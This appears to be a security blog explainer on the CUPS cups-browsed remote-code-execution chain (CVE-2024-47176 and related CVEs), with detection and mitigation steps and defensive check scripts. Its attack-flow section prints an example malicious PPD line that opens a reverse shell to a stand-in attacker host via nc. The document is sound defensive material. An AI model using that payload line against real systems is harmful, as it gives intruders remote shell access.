CUPS RCE Vulnerabilities (CVE-2024-47176): Linux Printing System as an Attack Vector

In September 2024, security researcher Simone Margaritelli (evilsocket) disclosed a chain of critical vulnerabilities in the Common Unix Printing System (CUPS) that allows unauthenticated remote code execution on Linux systems. What makes this particularly alarming: CUPS is installed by default on most Linux distributions, and the attack surface is a UDP service listening on port 631.

The Vulnerability Chain

The attack chains four separate CVEs together:

  • CVE-2024-47176 — cups-browsed binds to UDP 0.0.0.0:631, trusting any incoming IPP/HTTP packet
  • CVE-2024-47076 — libcupsfilters doesn’t validate returned IPP attributes
  • CVE-2024-47175 — libppd doesn’t sanitize IPP attributes when writing to PPD files
  • CVE-2024-47177 — cups-filters allows arbitrary command injection via FoomaticRIPCommandLine

How the Attack Works

# Attack flow:
# 1. Attacker sends a crafted UDP packet to port 631
# 2. cups-browsed automatically connects to the attacker's malicious IPP server
# 3. Malicious server returns a crafted PPD file with injected commands
# 4. When a user prints, the injected commands execute as the lp user

# Step 1: Attacker runs a malicious IPP server (proof-of-concept):
# The PoC (available on GitHub) sends:
# PACKET to target:631/udp:
# "0 3 http://attacker.com:12345/printers/fake-printer"

# Step 2: cups-browsed automatically fetches:
# GET http://attacker.com:12345/printers/fake-printer.ppd
# The PPD contains:
# *cupsFilter: "application/vnd.cups-simple 0 attacker-script"
# *FoomaticRIPCommandLine: "id; nc attacker.com 9999 -e /bin/sh"

# Step 3: User triggers print -> RCE as lp user

Check If You Are Vulnerable

# Check if cups-browsed is running:
sudo systemctl status cups-browsed
ps aux | grep cups-browsed

# Check if port 631 is exposed:
sudo ss -ulnp | grep 631
# Dangerous: output shows 0.0.0.0:631 (listening on all interfaces)

# Check installed versions:
dpkg -l | grep -E "cups|libcupsfilters|libppd"
# Vulnerable if cups-browsed < 2.0.1

# Check if exposed on network (UDP scans need raw sockets, so run nmap as root):
sudo nmap -sU -p 631 YOUR_IP
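The four checks above, folded into one script you can keep with your hardening notes. This is an added example of mine, not code from the original post: the parsing helpers take command output as arguments so they can be tried against a constructed `ss -ulnp` sample, the live path assumes a systemd host with `dpkg-query`, and the 2.0.1 threshold is the one given above.

```sh
#!/bin/sh
# Added example, not part of the original post: the manual checks above as one
# repeatable assessment. The parsing helpers take command output as arguments so
# they can be exercised against constructed samples (run with no arguments);
# `--run` executes the live commands on the current host.

# Constructed sample of `ss -ulnp` output showing the dangerous wildcard bind.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
UNCONN 0      0      0.0.0.0:631       0.0.0.0:*         users:(("cups-browsed",pid=812,fd=7))
UNCONN 0      0      127.0.0.1:323     0.0.0.0:*         users:(("chronyd",pid=455,fd=5))'

# Exit 0 when the given `ss -ulnp` output shows UDP 631 bound to a wildcard
# address (0.0.0.0, * or [::]), i.e. reachable on every interface.
udp631_wildcard() {
  printf '%s\n' "$1" | awk '
    $1 == "UNCONN" && ($4 == "0.0.0.0:631" || $4 == "*:631" || $4 == "[::]:631") { found = 1 }
    END { exit !found }'
}

# Exit 0 when upstream version $1 is older than $2. Debian epochs ("1:") and
# revisions ("-0ubuntu7.1") are stripped and only dotted numeric components are
# compared, which is sufficient for the cups-browsed versions discussed here.
version_lt() {
  a=${1#*:}; a=${a%%-*}
  b=${2#*:}; b=${b%%-*}
  awk -v a="$a" -v b="$b" 'BEGIN {
    n = split(a, x, "."); m = split(b, y, ".")
    k = (n > m) ? n : m
    for (i = 1; i <= k; i++) {
      xi = (i <= n) ? x[i] + 0 : 0
      yi = (i <= m) ? y[i] + 0 : 0
      if (xi < yi) exit 0
      if (xi > yi) exit 1
    }
    exit 1
  }'
}

# Live assessment: prints findings, returns 0 when nothing risky was seen, 1 otherwise.
assess_host() {
  risky=0
  if command -v systemctl >/dev/null 2>&1 && systemctl is-active --quiet cups-browsed; then
    echo "FINDING: cups-browsed is running"; risky=1
  fi
  if command -v ss >/dev/null 2>&1 && udp631_wildcard "$(ss -ulnp 2>/dev/null)"; then
    echo "FINDING: UDP 631 is bound to all interfaces"; risky=1
  fi
  ver=""
  if command -v dpkg-query >/dev/null 2>&1; then
    ver=$(dpkg-query -W -f '${Version}' cups-browsed 2>/dev/null) || ver=""
  fi
  if [ -n "$ver" ] && version_lt "$ver" 2.0.1; then
    echo "FINDING: cups-browsed $ver is older than the fixed 2.0.1"; risky=1
  fi
  [ "$risky" -eq 0 ] && echo "OK: no cups-browsed exposure found"
  return "$risky"
}

# Offline demonstration on the constructed sample and a few version strings.
demo() {
  if udp631_wildcard "$SAMPLE_SS"; then echo "sample ss output: UDP 631 bound to all interfaces"; fi
  for v in 1.28.17-3 2.0.0-0ubuntu6 2.0.1-0ubuntu7.1 1:2.1.0; do
    if version_lt "$v" 2.0.1; then echo "$v: vulnerable (< 2.0.1)"; else echo "$v: patched"; fi
  done
}

case "${1:-}" in --run) assess_host ;; *) demo ;; esac
```

Run it with no arguments to see the verdict on the embedded sample and the version strings; `sudo sh cups_check.sh --run` assesses the real host (`ss` only shows owning process names when run as root). The version helper deliberately ignores the Debian revision, so confirm against your distribution's advisory or `apt-cache policy`: a backported fix does not always change the upstream version number.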

Immediate Fix

# Option 1: Disable and stop cups-browsed (recommended for servers):
sudo systemctl stop cups-browsed
sudo systemctl disable cups-browsed
# Verify:
sudo systemctl status cups-browsed

# Option 2: Block port 631 at firewall (if you need local printing):
sudo ufw deny 631
# Or with iptables:
sudo iptables -A INPUT -p udp --dport 631 -j DROP
sudo iptables -A INPUT -p tcp --dport 631 -j DROP

# Option 3: Patch (when available for your distro):
sudo apt update && sudo apt upgrade cups cups-browsed libcupsfilters1
# Ubuntu fix: cups-browsed >= 2.0.1-0ubuntu7.1

# Check patch status:
apt-cache policy cups-browsed

Is Your Server Exposed to the Internet?

# Check if UDP 631 is reachable from outside:
# From an external machine (UDP scans need root):
sudo nmap -sU -p 631 YOUR_PUBLIC_IP

# Shodan query to see scale of exposure:
# Search: port:631 product:CUPS
# At time of disclosure: ~300,000 CUPS instances exposed on internet

# For corporate networks - sweep all Linux hosts (run as root for UDP scanning):
sudo nmap -sU -p 631 192.168.0.0/16 --open
# Any host showing 631/udp open needs immediate attention

Detection in Logs

# Monitor for exploitation attempts:
sudo tail -f /var/log/cups/error_log | grep -E "Add|printer|browsed"

# Look for unexpected new printers being added:
lpstat -p  # List configured printers
# Unexpected printers from unknown hosts = potential exploitation attempt

# Wazuh custom rule (add to /var/ossec/etc/rules/local_rules.xml; rules must sit inside a <group>).
# Wazuh joins several <match> elements in one rule into a single string, so the
# program name is matched with <program_name> and <match> is kept for the message text:
# <group name="cups,local,">
#   <rule id="100200" level="12">
#     <program_name>cups-browsed</program_name>
#     <match>New printer</match>
#     <description>CUPS: Unexpected new printer added (possible CVE-2024-47176)</description>
#   </rule>
# </group>
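To act on the two points above (unexpected printers in the queue list, printer-creation events in error_log) without eyeballing output, here is an added example of mine, not code from the original post. It reads `lpstat -v` (which, unlike `lpstat -p`, shows each queue's device URI) and error_log, flags queues whose URI points at a host outside an allowlist, marks cups-browsed's auto-created implicitclass queues for review, and extracts creation events. The allowlist, queue names, hosts and log lines are constructed for the demo; the log sample follows the style of cupsd's "Printer ... added by" messages and should be checked against your own error_log.

```sh
#!/bin/sh
# Added example, not part of the original post: triage the printer inventory and
# the CUPS log for queues that cups-browsed may have created behind your back.
# Assumptions: `lpstat -v` prints "device for <queue>: <device-uri>" lines,
# ALLOWED_PRINT_HOSTS lists your legitimate print servers, and the log sample
# below is constructed in the style of cupsd's error_log. Run with no arguments
# for the offline demo, or with `--run` to inspect the current host.

ALLOWED_PRINT_HOSTS="print01.corp.example 10.0.5.20"   # assumption: replace with yours

# Constructed `lpstat -v` output: two known printers, one queue pointing at an
# unknown host, one auto-created (implicitclass) queue.
SAMPLE_LPSTAT='device for hp_floor2: socket://10.0.5.20:9100
device for print01: ipp://print01.corp.example:631/printers/print01
device for fake-printer: ipp://198.51.100.7:12345/printers/fake-printer
device for auto_queue: implicitclass://auto_queue/'

# Constructed error_log lines (format approximates cupsd's "Printer ... added by" messages).
SAMPLE_LOG='I [26/Sep/2024:14:02:11 +0000] Listening to [::]:631 (IPv6)
I [26/Sep/2024:14:03:40 +0000] Printer "fake-printer" added by "root".
I [26/Sep/2024:14:03:41 +0000] Printer "fake-printer" modified by "root".
E [26/Sep/2024:14:04:02 +0000] [Job 12] Unable to start filter'

# Host part of a device URI (ipp://host:631/..., socket://host:9100, ipp://[v6]:631/...).
uri_host() {
  h=${1#*://}; h=${h%%/*}
  case $h in
    \[*) h=${h#"["}; h=${h%%"]"*} ;;
    *)   h=${h%%:*} ;;
  esac
  printf '%s\n' "$h"
}

# Read `lpstat -v` output on stdin; emit one line per queue that deserves a look.
suspicious_queues() {
  while IFS= read -r line; do
    case $line in "device for "*) ;; *) continue ;; esac
    rest=${line#"device for "}
    queue=${rest%%:*}
    uri=${rest#*": "}
    case ${uri%%://*} in
      implicitclass)
        # cups-browsed normally gives the queues it creates implicitclass:// URIs,
        # so each of these was discovered on the network rather than configured by you.
        printf 'REVIEW %s auto-created by cups-browsed (%s)\n' "$queue" "$uri" ;;
      ipp|ipps|http|https|socket|lpd)
        host=$(uri_host "$uri")
        known=0
        for a in $ALLOWED_PRINT_HOSTS; do
          if [ "$a" = "$host" ]; then known=1; fi
        done
        if [ "$known" -eq 0 ]; then
          printf 'ALERT %s points at unknown host %s (%s)\n' "$queue" "$host" "$uri"
        fi ;;
    esac
  done
  return 0
}

# Read CUPS error_log on stdin; keep lines recording queue creation or modification.
printer_add_events() {
  awk '/Printer "[^"]+" (added|modified) by/'
}

if [ "${1:-}" = "--run" ]; then
  lpstat -v 2>/dev/null | suspicious_queues
  printer_add_events < /var/log/cups/error_log
else
  printf '%s\n' "$SAMPLE_LPSTAT" | suspicious_queues
  printf '%s\n' "$SAMPLE_LOG" | printer_add_events
fi
```

With the sample data the script prints one ALERT for `fake-printer` (host 198.51.100.7 is not in the allowlist), one REVIEW line for the implicitclass queue, and the two "added"/"modified" log events. Feeding the `--run` output into cron or your SIEM gives you the same signal the Wazuh rule above provides, but grounded in the queue inventory rather than in a log string that depends on cups-browsed's logging verbosity.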

Wrap Up

The CUPS vulnerability chain is a sobering reminder that services we take for granted — like printing — can be serious attack vectors. If you're running Linux servers that don't need printing, disable cups-browsed immediately. For workstations that need local printing, patch and block port 631 at your perimeter firewall. No exceptions.